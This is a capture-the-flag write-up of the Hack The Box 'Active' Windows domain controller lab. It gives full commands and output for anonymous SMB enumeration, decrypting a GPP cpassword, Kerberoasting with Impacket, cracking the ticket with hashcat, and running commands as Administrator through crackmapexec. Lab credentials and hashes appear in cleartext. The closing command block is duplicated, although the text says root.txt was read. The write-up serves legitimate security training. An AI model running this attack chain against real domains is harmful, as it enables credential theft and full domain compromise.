Active Writeup

July 30, 2023 | 8 minutes

Reconnaissance

$ nmap 10.10.10.100 -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152,49153,49154,49155,49
157,49158,49165,49168,49169 -o nmap.txt
Host is up (0.18s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-30 18:16:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49168/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-09-30T18:17:00
|_  start_date: 2023-09-30T18:10:28
| smb2-security-mode:
|   210:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Initial Access

There are three ports that stood out to me in my nmap scan: port 135 (RPC), 389 (LDAP) and 445 (SMB), as they are all possible gateways to further enumeration without credentials. RPC and LDAP both seemed to have restrictions on anonymous/guest authentication attempts. But at the end of the day, it always seems to be SMB! I was able to authenticate anonymously (null credentials).

Port 135 (RPC)

$ rpcclient -U "" -N 10.10.10.100
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

No permissions.

Port 389 (LDAP)

$ ldapsearch -H ldap://10.10.10.100 -b "dc=active,dc=htb"
SASL/GSS-SPNEGO authentication started
ldap_sasl_interactive_bind_s: Local error (-2)
additional info: SASL(-1): generic failure: GSSAPI Error: Unspecified GSS failure.  
Minor code may provide more information (SPNEGO cannot find mechanisms to negotiate)

$ ldapsearch -x -H ldap://10.10.10.100 -b "dc=active,dc=htb"
# extended LDIF
#
# LDAPv3
# base <dc=active,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1

Unable to bind using anonymous login. The -x in the second ldapsearch query specifies NTLM authentication rather than Kerberos authentication (Kerberos by default).

Port 445 (SMB)

$ crackmapexec smb 10.10.10.100 -u '' -p ''
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\:

Anonymous authentication valid!

SMB Enumeration

Using crackmapexec, I can download files I have access to with anonymous login.

$ crackmapexec smb 10.10.10.100 -u '' -p '' -M spider_plus -o READ_ONLY=false DOWNLOAD=true

SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\:

...

SPIDER_P... 10.10.10.100    445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_P... 10.10.10.100    445    DC               [*]  OUTPUT_FOLDER: /tmp/cme_spider_plus
SPIDER_P... 10.10.10.100    445    DC               [+] Saved share-file metadata to "/tmp/cme_spider_plus/10.10.10.100.json".
SPIDER_P... 10.10.10.100    445    DC               [*] SMB Shares:           7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_P... 10.10.10.100    445    DC               [*] SMB Readable Shares:  1 (Replication)

...

SPIDER_P... 10.10.10.100    445    DC               [*] File unique exts:     4 (.pol, .inf, .ini, .xml)
SPIDER_P... 10.10.10.100    445    DC               [*] Downloads successful: 7
SPIDER_P... 10.10.10.100    445    DC               [+] All files processed successfully.

I looked through the files that crackmapexec found on the SMB server (outputted to tmp/cme_spider_plus locally). Finally, I found a set of credentials in a Groups.xmlfor user SVC_TGS with an unrecognized encoding for the password.

$ cat /tmp/cme_spider_plus/10.10.10.100/SYSVOL/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\**SVC_TGS**" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
	<Properties action="U" newName="" fullName="" description="" cpassword="**edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ**" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>

The password was within a parameter called cpassword, which I wasn’t familiar with. After some research, it turned out to be a GPP (Group Policy Preferences) password. A long long time ago (Windows Server 2012 and previous), it was a hardcoded password that was associated with a Group Policy for specific scenarios. This password was stored in Groups.xml, and available to all domain users without elevated permissions (hence why my anonymous user could view it).

SVC_TGS:**edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ**

This cpassword can be cracked offline. I used gp3finder.

$ gp3finder -D edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Group Policy Preference Password Finder (GP3Finder) 5.0.0
Copyright (C) 2020  Oliver Morton
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

INFO: gp3finder: Decrypted password is 26 characters.
INFO: gp3finder: --------------------------
INFO: gp3finder: GPPstillStandingStrong2k18
INFO: gp3finder: --------------------------

I could also authenticate to SMB with the new set of credentials.

$ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

Privilege Escalation

Assuming that the SVC in SVC_TGS was for “Service”, I proceeded with the idea that it was a Service Account. Service Accounts are User Accounts on Windows Active Directory that have SPNs (Service Principal Names). A User Account (SVC_TGS) can request a TGS (Ticket-Granting-Service) Ticket for services that run for user accounts. TGS tickets are structured to be encrypted using the corresponding User Account (SVC_TGS), which therefore can be cracked offline. This kind of attack is known as Kerberoasting.

To request TGS Tickets, I can use the [Get-UserSPNs.py](http://Get-UserSPNs.py) from Impacket. Ensure that the domain name is linked to the IP in your /etc/hosts.

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket for Exegol - v0.10.1.dev1+20230909.241.3001b26 - Copyright 2022 Fortra - forked by ThePorgs

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 12:06:40.351723  2023-09-30 19:09:12.575774

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$82d533fc153c10625c6ffef7a269f8fc$d09a4ddc37f3bec122e37b599adad8c5832f4a5ccf8a8babfc272553304ab4ec1ab6fb0b9ba8afa9d283cec6ab1775f328ef1eb7bb794713072e2d704a6402ab7f11f6d345d5defe25931070dba2265c2d310d032f39099ba1f8124bda8f7acc6ab438262956c491fdeae25bc318ed73614ee4712e56e48b7248fd08b6b5260461f117ca06d63f8113b07665aa55ee18649a1a45a8a215cd8cd9d7d8c1d64e17df59d212879e5f9c69da59a4c48d2360cf3502d1d08d92341e8bbfe753c7d0e59cba0de8c6bac21147abbf63c2f000542ed19695cf94fcec12db4b96c7217376415f5dddb605e0d64e9d5ce9d781cb9a8efd6e0363944574cafa13d17c18e51f5946580402dc669cb4ce7668118afaed033f72f9165032d56450ed9c0fbc84e390ca50c764c26f5c47fbca1919aff071c1c8d1c8c3ccebc6a10a9924f1349b71489eef968fec3a5f8fa4f7551255b19ce09fd2e433fe8a950131bc7c1f4056d4077d4c2bff1b3b036b2c820cad831eebca518b9e2378c5d18a6bf3b0b454f74309c9d004728edde1d59faaf5c05a2620b338de77967f5665d89152fdfa0a9bcc3e2964bfc05e5c049391b240ca8e021d557e502c44e5cba5f25a171cd70c6364ae647a6f2c93d0124b322d85a16d43dbfd0c82f14d42f9775d9846c4f49cc73a04e772c927e480587507d26cc0bf8ed2caa051932bb8410c116b84b5c99f8abc949129d664b7ae43c452e2e6e52349b62a5d6a0d5f42a7ffc55934006ca258d980b1668a652844d46e8959546a95038f40dd804f878b41d3d52831240296c20047b2e6dd5a60d6131b3cf3da5f402b8cada164a38191c421289073bc1ef8c4b4b3f60b75af962ba5442b80c737ebad71f8ce2b1cc434c94aeb1a5c0d7e75b254c058ffce225065a5edb96f991c7aa21fd7894d9832107c669735357fe6fc9c9d177180a1727bc24bb34d7b533dfc7aca79810a29fefa7cf48066f021a1e3dfee61581bee30a1e4b85a714ce875413f193962b363b77f168acffdb2e2e83ece06fd843beec162500cd6d29d7b93a9992b43dc44b95febb299fd131085c36ae0a5dc96babc16d3acd3ba8ca5648905f4a36631a167ab9513214f7bd6f55b50a20c2ffe7a027dfaafde0495de5d7b208f20a269c1201b643af4be78179a168e6ae6376cb86e115f040c6b087e01ef7e72402cdff566ebc4a370781a4726a107e8d033c21b30948967634fe2d019ea1301d0a1eacd2487ef2475b302

Like I mentioned previously, the TGS Ticket can be cracked offline. My choice of cracker is hashcat.

$ hashcat -m 13100 TGS.txt rockyou.txt

...

Administrator:Ticketmaster1968

With Administrator credentials, I can execute commands through crackmapexec since I have maximum privileges. I read user.txt and root.txt with type, and I was done!

$ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' -x "type C:\Users\SVC_TGS\Desktop\user.txt"
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (admin)
SMB         10.10.10.100    445    DC               [+] Executed command via wmiexec
SMB         10.10.10.100    445    DC               63c7f991f863ad472d860994c7b966c5

$ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' -x "type C:\Users\SVC_TGS\Desktop\user.txt"
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (admin)
SMB         10.10.10.100    445    DC               [+] Executed command via wmiexec
SMB         10.10.10.100    445    DC               63c7f991f863ad472d860994c7b966c5